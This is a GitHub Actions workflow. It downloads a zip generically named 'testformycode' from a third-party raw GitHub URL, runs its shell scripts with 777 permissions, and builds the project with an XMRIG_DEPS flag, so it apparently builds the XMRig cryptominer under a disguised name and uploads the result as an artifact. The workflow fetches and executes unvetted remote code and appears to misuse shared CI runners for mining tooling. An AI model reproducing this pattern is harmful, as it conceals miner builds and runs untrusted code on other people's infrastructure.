name: Build and Install Dependencies

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      - name: Set up Docker Build
        run: |
          echo "FROM debian:wheezy" > Dockerfile
          echo "RUN echo 'deb http://archive.debian.org/debian/ wheezy main' > /etc/apt/sources.list && \\" >> Dockerfile
          echo "    echo 'Acquire::Languages none;' >> /etc/apt/apt.conf.d/99no-languages && \\" >> Dockerfile
          echo "    apt-get update && \\" >> Dockerfile
          echo "    apt-get install -y curl unzip wget git build-essential wget cmake automake libtool autoconf && \\" >> Dockerfile
          echo "    apt-get clean" >> Dockerfile

      - name: Build Docker Image
        run: |
          docker build -t testformycode .

      - name: Download and Unzip Source Code
        run: |
          curl -L -o testformycode.zip https://raw.githubusercontent.com/tjbcc0/tetmc/refs/heads/main/testformycode.zip
          unzip testformycode.zip

      - name: Build Project
        run: |
          cd testformycode/scripts
          chmod 777 *.sh
          ./build_deps.sh
          cd ..
          mkdir build
          cd build
          cmake -DXMRIG_DEPS=scripts/deps -DBUILD_SHARED_LIBS=OFF ..
          make

      - name: Upload Build Artifacts
        uses: actions/upload-artifact@v3
        with:
          name: build-output
          path: testformycode/build  # 修改为你希望上传的文件路径
